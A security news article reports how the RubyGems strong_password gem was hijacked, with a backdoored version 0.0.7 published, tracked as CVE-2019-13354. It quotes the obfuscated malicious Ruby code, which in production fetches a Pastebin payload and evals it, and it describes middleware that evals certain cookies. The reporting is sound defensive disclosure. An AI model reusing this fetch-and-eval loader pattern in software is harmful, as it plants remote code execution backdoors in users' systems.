Thursday, October 10, 2024
HomeInternetRubyGems strong_password Library Hijacked by Threat Actors

RubyGems strong_password Library Hijacked by Threat Actors

Published on

Ruby users who updated with strong_password gem version 0.0.7 are urged to roll back to the previous versions after a developer discovered the malicious code in the gem.

The developer named Tute Costa who noticed the inclusion of backdoor while performing regular security audits. He spotted the changes with strong_password on gem hosting service, but not with any branch in GitHub.

“It appeared to have gone from 0.0.6 to 0.0.7, yet the last change in any branch in GitHub was from 6 months ago, and we were up to date with those.”The Strong_password is gem used by developers to check the password strength of the apps.

- Advertisement - EHA

The strong_password v 0.0.6 was downloaded more than 38,000 times and the backdoored version 0.0.7 was downloaded 537 times.

He further downloaded the gem from Rubygems and compared to the copy in GitHub, following code was added with the latest version and change was appended from a different account than the maintainer’s one.

def !;begin;yield;rescue Exception;end;end 
!{Thread.new{loop{_!{sleep
rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/xa456PFt')))}}}if
Rails.env[0]=="p"}

According to the code, it appears attackers use Pastebin to download the secondary payload, the code runs only if it is running in a production environment with an empty exception.

The attack also injects a middleware that “eval‘s cookies named with an __id suffix, only in production, all surrounded by the empty exception handler! a function that’s defined in the hijacked gem.”

The vulnerability has been assigned with CVE identifier CVE-2019-13354. A newer version 0.0.8 of ruby gem with the clean code is released and the details can be seen from the official page of RubyGems.

Download: Free GDPR Comics Book – Importance of Following General Data Protection Regulation (GDPR) to protect your Company Data and user privacy

You can follow us on Linkedin, Twitter, Facebook for daily Cybersecurity updates also you can take the Best Cybersecurity course online to keep yourself updated.

Critical DLL Hijacking Vulnerability in PC-Doctor For Windows Let Hackers Attack Hundreds of Million DELL Computers

Account Take over Vulnerability in EA Origin Game Client Let Hackers Hijack the 300 Million Gamers Account

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

Hackers Exploiting Zero-day Flaw in Qualcomm Chips to Attack Android Users

Hackers exploit a zero-day vulnerability found in Qualcomm chipsets, potentially affecting millions worldwide.The flaw,...

Foxit PDF Reader Vulnerability Let Attackers Execute Arbitary Code

Researchers recently disclosed six new security vulnerabilities across various software, as one critical vulnerability...

Wireshark 4.4.1 Released, What’s new!

Wireshark, the world’s leading network protocol analyzer, has just released version 4.4.1, bringing a...

Multiple VMware NSX Vulnerabilities Let Attackers Gain Root Access

VMware has disclosed multiple vulnerabilities in its NSX product line that could potentially allow...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

Multiple VMware NSX Vulnerabilities Let Attackers Gain Root Access

VMware has disclosed multiple vulnerabilities in its NSX product line that could potentially allow...

CISA Warns of Fortinet & Ivanti Vulnerabilities Exploited in Attacks

The Cybersecurity and Infrastructure Security Agency (CISA) has recently updated its Known Exploited Vulnerabilities...

Chrome Security Update, Patched for High-Severity Vulnerabilities

Google has rolled out a new update for its Chrome browser, addressing several high-severity...